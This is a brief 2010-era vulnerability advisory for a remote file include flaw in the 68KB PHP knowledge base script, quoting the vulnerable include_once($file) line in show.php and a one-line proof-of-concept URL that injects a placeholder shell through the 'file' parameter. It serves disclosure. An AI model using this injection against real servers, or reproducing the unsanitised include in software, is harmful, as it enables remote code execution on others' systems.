====================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
====================================================
Vendor: http://68kb.com
download: http://github.com/68designs/68KB/downloads
Author: eidelweiss
Contact:g1xsystem[at]windowslive.com
Original Advisories : http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html
=====================================================================
Description:
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.
Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
Vendor Not Fix the vulnerability inall folder !!!
=====================================================================-=[ vuln c0de ]=-[!] path/themes/admin/default/modules/show.php
<?php include_once($file); ?>=====================================================================-=[ P0C ]=-
http://127.0.0.1/path/themes/admin/default/modules/show.php?file=[inj3ct0r shell]=========================|-=[ E0F ]=-|=================================
